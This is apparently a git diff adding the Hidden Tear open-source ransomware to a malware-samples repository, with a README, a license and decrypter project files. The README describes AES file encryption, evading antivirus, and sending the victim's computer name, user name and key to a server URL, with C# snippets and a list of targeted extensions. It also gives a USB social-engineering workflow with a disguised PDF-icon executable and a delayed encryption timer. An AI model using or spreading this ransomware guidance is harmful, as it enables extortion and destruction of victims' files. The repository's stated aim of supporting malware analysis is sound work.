import hidden tear ransom

README.md

@@ -7,6 +7,7 @@ Malware Samples. Uploaded to GitHub for those want to analyse the code.
 * Dendroid (Android Trojan)
 * Dexter v2 (Point of Sales Trojan)
 * Grum (Spam Bot)
+* Hidden Tear (Ransom)
 * KINS (Banking Trojan)
 * Mirai (IoT Botnet)
 * Pony 2.0 (Stealer)

hidden-tear/.gitignore

@@ -0,0 +1,196 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+
+# User-specific files
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+build/
+bld/
+[Bb]in/
+[Oo]bj/
+
+# Visual Studo 2015 cache/options directory
+.vs/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUNIT
+*.VisualState.xml
+TestResult.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+*_i.c
+*_p.c
+*_i.h
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# JustCode is a .NET coding addin-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# TODO: Comment the next line if you want to checkin your web deploy settings 
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# NuGet Packages
+*.nupkg
+# The packages folder can be ignored because of Package Restore
+**/packages/*
+# except build/, which is used as an MSBuild target.
+!**/packages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/packages/repositories.config
+
+# Windows Azure Build Output
+csx/
+*.build.csdef
+
+# Windows Store app package directory
+AppPackages/
+
+# Others
+*.[Cc]ache
+ClientBin/
+[Ss]tyle[Cc]op.*
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.pfx
+*.publishsettings
+node_modules/
+bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+
+# SQL Server files
+*.mdf
+*.ldf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt

hidden-tear/LICENSE

@@ -0,0 +1,21 @@
+The MIT License (MIT)
+
+Copyright (c) 2015-2016 Utku Sen
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

hidden-tear/README.md

@@ -0,0 +1,93 @@
+# hidden tear 
+Open Source Ransomware
+
+Uploaded to GitHub for those want to analyse the code.
+
+
+         _     _     _     _              _                  
+        | |   (_)   | |   | |            | |                 
+        | |__  _  __| | __| | ___ _ __   | |_ ___  __ _ _ __ 
+        | '_ \| |/ _` |/ _` |/ _ \ '_ \  | __/ _ \/ _` | '__|
+        | | | | | (_| | (_| |  __/ | | | | ||  __/ (_| | |   
+        |_| |_|_|\__,_|\__,_|\___|_| |_|  \__\___|\__,_|_|   
+                                                     
+It's a ransomware-like file crypter sample which can be modified for specific purposes. 
+
+**Features**
+* Uses AES algorithm to encrypt files.
+* Sends encryption key to a server.
+* Encrypted files can be decrypted in decryption program with encryption key.
+* Creates a text file on Desktop with given message.
+* Small file size (12 KB)
+* Undetectable by antivirus programs (15/08/2015) http://nodistribute.com/result/6a4jDwi83Fzt
+
+**Demonstration Video**
+
+https://www.youtube.com/watch?v=LtiRISepIfs
+
+**Usage**
+
+* You need to have a web server which supports scripting languages like php,python etc. Change this line with your URL. (You better use Https connection to avoid eavesdropping)
+
+  `string targetURL = "https://www.example.com/hidden-tear/write.php?info=";`
+
+* The script should writes the GET parameter to a text file. Sending process running in `SendPassword()` function
+
+  ```
+  string info = computerName + "-" + userName + " " + password;
+  var fullUrl = targetURL + info;
+  var conent = new System.Net.WebClient().DownloadString(fullUrl);
+  
+  ```
+* Target file extensions can be change. Default list:
+
+```
+var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
+```
+## Hidden Tear Offline Edition or: How I Learned to Stop Worrying and Love the Criminal Mind
+
+What if there is a computer with full of important files and what if it has no internet or network connection. We can access it physically. But what if we were being watched, how can we execute hidden tear and get the encryption key?
+
+**Demonstration Video**
+
+https://www.youtube.com/watch?v=ayjv_aAwO0k
+
+**Prerequisites**
+
+Firstly you should have a usb stick which includes:
+
+* exe file of hidden tear offline with a pdf icon.
+* a normal pdf file like hotel reservation, ticket, lecture notes (that depends on your social engineering scenario)
+* a txt file
+
+**Workflow**
+
+After you plugged usb stick to the computer, double click to .exe file. Don't worry, the normal pdf file will be open.
+
+Hidden tear offline creates an encryption key and saves it into the txt file which is inside your usb stick. After than it copies exe file to the computer and executes. This process will be done in seconds. After than, you can unplug your usb stick.
+
+Hidden tear offline will wait for some time which specified before, lets say 10 minutes. After 10 minutes, it will encrypt all the target files in computer. This part is same with the original hidden tear.
+
+**Usage**
+
+* Hidden tear offline will save the encryption key inside this txt file.
+
+`string usbPassword = "adobe.txt";`
+
+* It copies itself to this path after the first execution.
+
+`string exePath = userDir + userName + "\\table.exe";`
+
+* Name of the normal pdf file.
+
+`System.Diagnostics.Process.Start("ticket.pdf");`
+
+* `Timer1`'s interval represents the encryption start time. If you set it to 600000 miliseconds, encryption action will start after 10 minutes the first execution. If you need more time to leave the scene, you can increase the interval.
+
+## Legal Warning
+
+While this may be helpful for some, there are significant risks. hidden tear may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.
+
+## Thanks
+
+Special thanks to Ikikardes who helped me to publish this code.

hidden-tear/hidden-tear-decrypter/hidden-tear-decrypter.sln

@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.31101.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "hidden-tear-decrypter", "hidden-tear-decrypter\hidden-tear-decrypter.csproj", "{82C19CBA-E318-4BB3-A408-5005EA083EC5}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{82C19CBA-E318-4BB3-A408-5005EA083EC5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{82C19CBA-E318-4BB3-A408-5005EA083EC5}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{82C19CBA-E318-4BB3-A408-5005EA083EC5}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{82C19CBA-E318-4BB3-A408-5005EA083EC5}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

hidden-tear/hidden-tear-decrypter/hidden-tear-decrypter/App.config

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+    <startup> 
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
+    </startup>
+</configuration>